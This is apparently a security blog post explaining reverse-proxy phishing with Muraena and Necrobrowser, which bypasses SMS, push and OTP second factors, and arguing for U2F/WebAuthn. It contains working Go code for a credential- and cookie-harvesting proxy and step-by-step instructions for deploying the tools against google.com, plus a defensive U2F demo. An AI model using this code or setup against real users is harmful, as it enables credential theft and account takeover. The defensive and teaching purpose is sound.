Phishing remains one of the most pervasive threats to the enterprise. The simple but effective technique of tricking unsuspecting users into divulging sensitive information such as usernames and passwords has remained incredibly successful. This is usually achieved by redirecting the user to a site which impersonates a legitimate service and captures the victim's credentials as they are entered; the attacker can then replay those credentials to achieve their goal.
Two-factor authentication (2FA) was once a hurdle for this type of attack, but techniques to bypass many 2FA methods were quickly adopted and built into a variety of phishing frameworks. It is important to understand how these bypasses work so that defenders can push for standards, such as U2F, that remain resilient against them.
On 15 May 2019 the Muraena Team released Muraena and Necrobrowser. Initially teased in their talk at HITB2019AMS, the Muraena / Necrobrowser tools aim to automate the phishing of credentials, 2FA tokens, and subsequent post-phishing activities. This is achieved by Muraena acting as a transparent reverse proxy solution which captures credentials and session cookies. These valid sessions are handed off to Necrobrowser, which uses the gathered sessions to impersonate the victim. Necrobrowser instruments a set of Dockerized Chrome browsers to keep alive the stolen sessions, automate the extraction of data and perform other actions on the attacker’s behalf. You can check out the slides for more information.
We configured Muraena to phish credentials from a test Google account and used Necrobrowser's built-in functionality to automate the mining of the target's Gmail inbox. This can be seen in the video below:
As demonstrated in the video, because Muraena uses a reverse proxy to intercept traffic between the user and the target website, the user experience is virtually indistinguishable from navigating directly to the website itself (apart from the domain shown in the address bar). This is in stark contrast to the phishing platforms of old, which typically serve prebaked templates that often break on dynamic website content.
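To make the mechanism concrete, the following is an added example written for this article in Go; it is not Muraena's code. It shows the three rewrites a transparent reverse-proxy phishing kit performs: the Host header and POST bodies on the way in (harvesting the password and OTP), and Set-Cookie, Location and body references on the way out (so the session cookie and every link stay scoped to the attacker's domain). The hosts target.example and phish.example are hypothetical, the "real service" is a constructed stand-in, and both sides run on loopback so the demo works offline.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strings"
	"sync"
)

// Capture collects what flows through the proxy: POST bodies (credentials,
// OTP codes) on the way in and Set-Cookie headers on the way out.
type Capture struct {
	mu      sync.Mutex
	Bodies  []string
	Cookies []string
}

// NewPhishProxy returns a reverse proxy for upstream that makes the real
// service (realHost) appear under the attacker's domain (phishHost).
func NewPhishProxy(upstream *url.URL, realHost, phishHost string, capture *Capture) *httputil.ReverseProxy {
	rp := httputil.NewSingleHostReverseProxy(upstream)
	director := rp.Director
	rp.Director = func(r *http.Request) {
		director(r)
		r.Host = upstream.Host // the real service must see its own hostname
		if r.Method == http.MethodPost && r.Body != nil {
			body, _ := io.ReadAll(r.Body)
			r.Body = io.NopCloser(bytes.NewReader(body)) // forward untouched
			capture.mu.Lock()
			capture.Bodies = append(capture.Bodies, string(body))
			capture.mu.Unlock()
		}
	}
	rp.ModifyResponse = func(resp *http.Response) error {
		// 1. Harvest session cookies, then re-scope them to the phishing
		//    domain so the victim's browser keeps sending them to the proxy.
		cookies := resp.Header["Set-Cookie"]
		for i, c := range cookies {
			capture.mu.Lock()
			capture.Cookies = append(capture.Cookies, c)
			capture.mu.Unlock()
			cookies[i] = strings.ReplaceAll(c, realHost, phishHost)
		}
		// 2. Keep redirects inside the proxy.
		if loc := resp.Header.Get("Location"); loc != "" {
			resp.Header.Set("Location", strings.ReplaceAll(loc, realHost, phishHost))
		}
		// 3. Rewrite absolute references in the body (a real kit must also
		//    decompress gzip responses and deal with JS and CSP; omitted here).
		body, err := io.ReadAll(resp.Body)
		if err != nil {
			return err
		}
		resp.Body.Close()
		body = bytes.ReplaceAll(body, []byte(realHost), []byte(phishHost))
		resp.Body = io.NopCloser(bytes.NewReader(body))
		resp.ContentLength = int64(len(body))
		resp.Header.Set("Content-Length", fmt.Sprint(len(body)))
		return nil
	}
	return rp
}

// RunDemo stands up a constructed stand-in for the real service and the
// proxy in front of it on loopback, replays a victim login through the
// proxy, and returns what was captured, the rewritten login page and the
// rewritten redirect target.
func RunDemo() (capture *Capture, page, redirect string, err error) {
	const realHost, phishHost = "target.example", "phish.example"
	capture = &Capture{}
	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodPost && r.URL.Path == "/login" {
			http.SetCookie(w, &http.Cookie{Name: "SID", Value: "s3ss10n", Domain: realHost, Path: "/", Secure: true, HttpOnly: true})
			http.Redirect(w, r, "https://"+realHost+"/inbox", http.StatusFound)
			return
		}
		fmt.Fprintf(w, `<form action="https://%s/login" method="post"></form>`, realHost)
	}))
	defer upstream.Close()
	u, _ := url.Parse(upstream.URL)
	proxy := httptest.NewServer(NewPhishProxy(u, realHost, phishHost, capture))
	defer proxy.Close()

	client := &http.Client{CheckRedirect: func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse }}
	resp, err := client.Get(proxy.URL + "/")
	if err != nil {
		return nil, "", "", err
	}
	b, _ := io.ReadAll(resp.Body)
	resp.Body.Close()
	resp, err = client.Post(proxy.URL+"/login", "application/x-www-form-urlencoded",
		strings.NewReader("user=alice&pass=hunter2&otp=123456")) // constructed victim input
	if err != nil {
		return nil, "", "", err
	}
	resp.Body.Close()
	return capture, string(b), resp.Header.Get("Location"), nil
}

func main() {
	capture, page, redirect, err := RunDemo()
	if err != nil {
		panic(err)
	}
	fmt.Println("captured credentials:", capture.Bodies[0])
	fmt.Println("captured cookie:     ", capture.Cookies[0])
	fmt.Println("rewritten redirect:  ", redirect)
	fmt.Println("rewritten page:      ", page)
}
```

Two things to notice: the OTP arrives in the same POST body as the password and is forwarded to the real service within the same second, which is why time-based and push-based second factors do not help; and the Set-Cookie header is captured before its Domain attribute is rewritten, so the attacker holds a cookie scoped to the real site while the victim keeps a copy scoped to the phishing site.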
The Muraena and Necrobrowser projects can be found at https://github.com/muraenateam
Both Muraena and Necrobrowser are implemented in Go, which can be installed here.
Once installed, you can compile Muraena using the following:
go get github.com/muraenateam/muraena
cd $GOPATH/src/github.com/muraenateam/muraena
make build
Your DNS will need a wildcard CNAME and an A record pointing at the host running your Muraena proxy, so that every subdomain of the phishing domain resolves to it. For ours this looks like:
*.redvsblue.team. 1 IN CNAME redvsblue.team.
redvsblue.team. 1 IN A MURAENA_IP_ADDR
You will need to modify the Muraena config file. In this example we use the preconfigured config/google.com.json file; change the beginning of it to look like the following:
{
"proxy": {
"phishing": "redvsblue.team",
"destination": "google.com",
"skipContentType": [
"font/*",
"image/*"
],
...
Muraena must present a certificate that is valid for every proxied subdomain, so a wildcard certificate is the practical choice. If you wish to use a Let's Encrypt wildcard certificate, you can follow these steps (the certbot-auto wrapper has since been deprecated in favour of the packaged certbot client, but the certonly arguments are the same):
wget https://dl.eff.org/certbot-auto
sudo mv certbot-auto /usr/local/bin/certbot-auto
sudo chown root /usr/local/bin/certbot-auto
sudo chmod 0755 /usr/local/bin/certbot-auto
certbot-auto certonly --server https://acme-v02.api.letsencrypt.org/directory --manual --preferred-challenges dns -d '*.redvsblue.team'
Then follow the prompts to validate domain ownership. This requires you to add the TXT record certbot prints to your DNS zone (at _acme-challenge.redvsblue.team) and wait for it to propagate before continuing.
Once validation succeeds, the certificate files are written to:
/etc/letsencrypt/live/redvsblue.team/
Update the Muraena config you intend to use so that its TLS section points at those files. It should look something like:
"tls": {
"enabled": true,
"expand": false,
"certificate": "/etc/letsencrypt/live/redvsblue.team/cert.pem",
"key": "/etc/letsencrypt/live/redvsblue.team/privkey.pem",
"root": "/etc/letsencrypt/live/redvsblue.team/fullchain.pem"
}
Run it by specifying your config file:
sudo ./muraena --config config/google.com.json
Once this is executed you should see Muraena start up and begin listening.
If all went well, you should now be able to navigate to your domain and your traffic will be proxied through Muraena. This alone lets you capture credentials and session data, but the real magic comes when you configure Necrobrowser, which automates the post-phishing activities for you and persists the collected sessions.
Necrobrowser uses Docker to run the Chrome browsers used to automate the post-exploitation tasks, so begin by installing Docker for your platform using the instructions at https://docs.docker.com/install/
Compile Necrobrowser using Go:
go get github.com/muraenateam/necrobrowser
cd $GOPATH/src/github.com/muraenateam/necrobrowser
If you're running Necrobrowser on the same machine as Muraena you can start it with the following command, substituting the token from your Muraena config:
sudo ./necrobrowser --token "ada9f7b8-6e6c-4884-b2a3-ea757c1eb617"
If successful you should see Necrobrowser start up and wait for sessions from Muraena.
With both Muraena and Necrobrowser running, each valid session Muraena captures is passed to Necrobrowser, which performs its predefined post-exploitation activities.
Once those complete, the session is kept alive within the Dockerized Chrome browser. The attacker can interact with this browser and ride the active session, giving full access to the victim's account for as long as that session remains valid.
2FA is often hailed as the ultimate solution to phishing, but not all 2FA solutions are infallible. Muraena can bypass a variety of 2FA methods including SMS, push, software authenticators, OTP and more, because in each case the second factor is just another value the victim types (or approves) that the proxy relays to the real site in real time. Thankfully, U2F provides some respite from attacks of this nature: the browser only lets a page use an appID its origin is entitled to, the token only signs for the appID its key was registered under, and the origin itself is part of the signed client data, so an assertion produced while the victim is on the phishing domain is useless to the real site. Widespread adoption of U2F (and of its successor WebAuthn/FIDO2, which binds assertions to the origin in the same way) is unfortunately still lacking, but hopefully tools such as Muraena will help to expedite the process.
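The origin binding is easier to trust once you have seen it fail for the attacker, so here is an added example in Go that models it; it is not the U2F reference implementation or any vendor's code. It reproduces the U2F authentication signature base (sha256(appID) || user-presence byte || counter || sha256(clientData)) with a P-256 key standing in for the token, and runs three logins: on the genuine site, through a Muraena-style proxy, and through a proxy that rewrites the origin in the client data after the token has signed. The origins accounts.example and phish.example and the challenge value are constructed for the demo.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"encoding/json"
	"errors"
	"fmt"
)

// Hypothetical origins for the demo.
const (
	RealOrigin  = "https://accounts.example" // the genuine relying party (also the U2F appID)
	PhishOrigin = "https://phish.example"    // a Muraena-style proxy in front of it
)

// clientData is assembled by the browser, not by the page it is showing.
type clientData struct {
	Typ       string `json:"typ"`
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

// signingInput mirrors the U2F authentication signature base:
// sha256(appID) || user-presence byte || counter || sha256(clientData).
func signingInput(appID string, counter uint32, cd []byte) []byte {
	app := sha256.Sum256([]byte(appID))
	cdh := sha256.Sum256(cd)
	var ctr [4]byte
	binary.BigEndian.PutUint32(ctr[:], counter)
	out := append([]byte{}, app[:]...)
	out = append(out, 0x01)
	out = append(out, ctr[:]...)
	return append(out, cdh[:]...)
}

// tokenSign plays the U2F device: it signs for the appID its key was
// registered under and never sees, or cares about, the page itself.
func tokenSign(priv *ecdsa.PrivateKey, appID string, counter uint32, cd []byte) ([]byte, error) {
	h := sha256.Sum256(signingInput(appID, counter, cd))
	return ecdsa.SignASN1(rand.Reader, priv, h[:])
}

// rpVerify plays the relying party: the origin inside clientData must be
// its own, and the signature must cover exactly that clientData.
func rpVerify(pub *ecdsa.PublicKey, appID, challenge string, counter uint32, cd, sig []byte) error {
	var parsed clientData
	if err := json.Unmarshal(cd, &parsed); err != nil {
		return err
	}
	if parsed.Challenge != challenge {
		return errors.New("challenge mismatch")
	}
	if parsed.Origin != RealOrigin {
		return fmt.Errorf("origin %q is not %q", parsed.Origin, RealOrigin)
	}
	h := sha256.Sum256(signingInput(appID, counter, cd))
	if !ecdsa.VerifyASN1(pub, h[:], sig) {
		return errors.New("signature does not match client data")
	}
	return nil
}

// NewToken generates the key pair a U2F device would hold for RealOrigin.
func NewToken() (*ecdsa.PrivateKey, error) {
	return ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
}

// Login runs one authentication. browserOrigin is where the victim's
// browser really has the page open; claimedOrigin is the origin that
// reaches the relying party, which an in-path attacker may try to rewrite.
func Login(priv *ecdsa.PrivateKey, browserOrigin, claimedOrigin string) error {
	const challenge = "Y29uc3RydWN0ZWQtY2hhbGxlbmdl" // constructed; real RPs send fresh random bytes
	build := func(origin string) []byte {
		b, _ := json.Marshal(clientData{Typ: "navigator.id.getAssertion", Challenge: challenge, Origin: origin})
		return b
	}
	cd := build(browserOrigin)
	sig, err := tokenSign(priv, RealOrigin, 1, cd)
	if err != nil {
		return err
	}
	if claimedOrigin != browserOrigin {
		cd = build(claimedOrigin) // attacker swaps the origin after the token signed
	}
	return rpVerify(&priv.PublicKey, RealOrigin, challenge, 1, cd, sig)
}

func main() {
	priv, err := NewToken()
	if err != nil {
		panic(err)
	}
	fmt.Println("genuine site: ", Login(priv, RealOrigin, RealOrigin))
	fmt.Println("via proxy:    ", Login(priv, PhishOrigin, PhishOrigin))
	fmt.Println("proxy tampers:", Login(priv, PhishOrigin, RealOrigin))
}
```

The model is generous to the attacker: a real browser would refuse to talk to the token at all from phish.example, because that origin is not a valid facet of the accounts.example appID. Even so, the relayed assertion fails on the origin check, and patching the origin fails on the signature, which is the property no SMS, push or TOTP code has.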
We will be discussing the nuances of different 2FA solutions in more depth in our upcoming 2FA Strategic Review paper, so stay tuned.